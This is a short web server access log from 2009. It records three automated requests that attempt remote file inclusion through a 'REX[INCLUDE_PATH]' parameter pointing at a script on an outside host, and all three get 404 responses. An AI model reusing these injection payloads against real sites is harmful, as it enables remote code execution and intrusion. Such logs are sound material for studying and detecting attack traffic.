222.239.76.25 - - [08/May/2009:01:30:18 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
210.68.188.206 - - [08/May/2009:01:30:19 -0400] "GET /logs/access_log.Q108081700//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.68.188.206 - - [08/May/2009:01:30:23 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
